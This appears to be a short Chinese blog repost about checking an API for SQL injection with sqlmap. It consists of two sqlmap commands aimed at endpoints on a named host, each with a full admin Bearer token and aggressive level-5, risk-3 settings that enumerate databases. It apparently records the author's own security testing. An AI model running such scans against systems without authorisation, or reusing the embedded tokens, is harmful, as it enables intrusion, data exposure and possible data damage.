首页 > 数据库 >sqlmap工具查询接口是否存在sql注入

sqlmap工具查询接口是否存在sql注入

时间:2024-09-05 16:18:31浏览次数:14  
标签:sqlmap 10000 cn -- random 接口 https sql

 

转:https://blog.csdn.net/m0_63641882/article/details/134529081

 

sqlmap -u 'https://orgvue3.cyberwing.cn/api/org/tree/unitTree?id=0&_t=1725517383534' --header 'Authorization: Bearer eyJraWQiOiI2MGMyY2RiNC03N2NlLTQzYzMtOTdiNS0xNmE1YjVlMDhlYzAiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhZG1pbnVzZXJkZXB0aWQiLCJhdWQiOiJvYXV0aDJzZXJ2ZXIiLCJuYmYiOjE3MjU1MTU0ODMsInVzZXJfbmFtZSI6ImFkbWluIiwiaXNzIjoiaHR0cDpcL1wvYXV0aC1zZXJ2ZXI6ODA4NiIsImV4cCI6MTcyNTUxOTA4MywiaWF0IjoxNzI1NTE1NDgzLCJ1c2VyZGVwdElkIjoiYWRtaW51c2VyZGVwdGlkIn0.P-RMGp7R8uBpio0iRSmgsc4kN0lwyHjZ7z5hcxBwBA6aH0soJkaFGb09TsJ3SeUKCJF2UhPxSeEXF1y2Dn2x0S5nQ4hlJ6Nw85KHu5gzdAf03tCyLrLo6WqEgzhZWToBFe1nlhWg-7BsxWI75fVoWEOh1g1ySVRtk1urT6ifUNs3zyIilMpX8oncTnM3fvG4R7QGnLGz8Hao15cTHg6eZAtS-8c8NwK3GO6EH2Law9Mv8f9vtPwJVR_sscAz891DDLng7JOZpexmU9Dqgtan-JrM51d7QaMrruF-Tk65wFqJogBaXEtsWDNviQB04dfhhILsnizgJ4XhNRquNh9wtg' --random-agent --level=5 --risk=3 --batch --dbs

 

 

sqlmap -u 'https://orgvue3.cyberwing.cn/api/org/QueryUserService/pageUserList?unitId=10000&id=10000&subOrgId=10000' --header 'Authorization: Bearer eyJraWQiOiI2MGMyY2RiNC03N2NlLTQzYzMtOTdiNS0xNmE1YjVlMDhlYzAiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhZG1pbnVzZXJkZXB0aWQiLCJhdWQiOiJvYXV0aDJzZXJ2ZXIiLCJuYmYiOjE3MjU1MTc3ODksInVzZXJfbmFtZSI6ImFkbWluIiwiaXNzIjoiaHR0cDpcL1wvYXV0aC1zZXJ2ZXI6ODA4NiIsImV4cCI6MTcyNTUyMTM4OSwibG9jYWxlIjoiemgtY24iLCJpYXQiOjE3MjU1MTc3ODksInVzZXJkZXB0SWQiOiJhZG1pbnVzZXJkZXB0aWQifQ.CI6lTpT-b3J8LbR0iPaFiy5fI51eqcduVxdtePNM9Pka8G1o_G4jycr6D87nCw2bP8K1a6PK6FTCi1-WOc4elJPaYvFqn3o8VNaJ7GQUjc0A80tq1Xclk0xSstkjeRr0mieWeu3m-J5l6jewfoDOjUPTOP2bjtd-jAK2KEpne95IImqGorVyeag3nSqrionRAxa38Dswcwd6e5tXo2y2Iz0V87ixYF72XSl-XAoxyRw0E-qMYh8aGsX6U8lt-1P7_1poUgaON7Xb0Va1zqDQCahoYSfKVMfUa-dbmICn-Zbm2TAFE2XNSjRWPouz06khPaMlkeEfkL1bAeBYQ5aEMA' --random-agent -level=5 --risk=3 --batch --dbs

标签:sqlmap,10000,cn,--,random,接口,https,sql
From: https://www.cnblogs.com/zhenyu1/p/18398697

相关文章

  • linux操作MySQL
    查看mysql是否正确安装sudorpm-qa|grepmysql查看mysql服务单元文件所在位置一般情况下,mysql的服务单元文件所在路径:/usr/lib/systemd/system说明:这个目录下面,如果放置的是mysqld.service文件,那么启动MySQL的时候需要使用的是mysqld;如果放置的是mysql.service文件,......
  • unittest如何设计支持运行多个应用的接口自动化框架(一)
    对于接口自动化框架,CI持续集成是一个无法绕开的话题。讨论这个话题,说实话还是有一点不知从何说起..或许应该拆开为多个话题去讨论,因为要讨论的点确实太多,既然这样,那么我就以我在实际工作中见到的一些接口自动化框架实现方案在CI上存在的一些设计不足来做讨论吧,可能这样更能戳到......
  • unitttest如何设计支持运行多个应用的接口自动化框架(二)
    在unittest如何设计支持运行多个应用的接口自动化框架(一)文章中展示了用unittest实现支持多个应用的理想实现效果,并且给出了我在实际工作中遇到的一些在实现多系统实现方案在落地时遇到的设计缺陷情况。作为非技术实现方案提供者或许意识不到没实现支持多应用对整个接口自动化......
  • MySQL内存优化指南:深入配置与性能提升
    在数据库管理中,内存的使用和优化是提升数据库性能的关键因素之一。MySQL作为一种流行的关系型数据库管理系统,提供了多种配置选项来优化内存使用,从而提高数据库的响应速度和处理能力。本文将详细介绍如何在MySQL中配置和优化内存使用,包括内存参数的配置、内存使用的监控以及......
  • SQL SERVER巡检脚本
    print'----------------------------'print'开始巡检'print'----------------------------'print'1.查看数据库版本信息'print'----------------------------'print'*********************************'SETNOCOUNTON;u......
  • MySQL数据归档策略:实现定期数据维护与优化
    在数据库管理中,数据归档是一个重要的环节,它不仅有助于维护数据的完整性和安全性,还可以优化数据库的性能。对于MySQL数据库,实现数据的定期归档可以通过多种方法,包括使用事件调度器、编写脚本或利用第三方工具。本文将详细介绍如何在MySQL中设置和执行定期归档任务,以确保数据......
  • 活动在即,不容错过丨亚信安慧AntDB诚邀您参加“PostgreSQL数据库技术峰会”
    ​​9月7日下午,“PostgreSQL数据库技术峰会”西安站将在西安市西安元谷学习中心4号厅举办。湖南亚信安慧科技有限公司(简称“亚信安慧”)受邀参会,将带来《提升企业数据安全,AntDB数据库回收站技术应用》的精彩演讲。在此,亚信安慧AntDB数据库诚邀您莅临参会,与业内专家共同探讨数据库技......
  • 20240904_182638 mysql 填空题 变量
    查看所有的系统变量名称showvariables查看所有系统变量中以auto开头的名称showvariableslike'auto%'查看系统变量autocommit的值select@@autocommit设置系统变量autocommit的值为1setautocommit=1设置自定义变量name的值为'tom'set@name='tom'查看自定义变量nam......
  • CentOS安装MySQL8教程
    官方地址:https://dev.mysql.com/downloads/mysql/选择版本前需先看一下服务器的glibc版本ldd--version上传将下载好的tar包上传到服务器上,这里演示上传到了/usr/local/文件夹下   (也可以自定义位置)解压tar-Jxvfmysql-8.0.39-linux-glibc2.17-x86_64.tar.......
  • SQL语句什么时候用having?以及怎么使用limit
    因为where关键字无法与合计函数一起使用,例如sum(),avg()等,所以当有条件的话,需要放在having下。eg:我们希望查找订单总金额少于2000的客户。SELECTCustomer,SUM(OrderPrice)FROMOrdersGROUPBYCustomerHAVINGSUM(OrderPrice)<2000MySQL无法使用top子句,所以要获得表中的特定......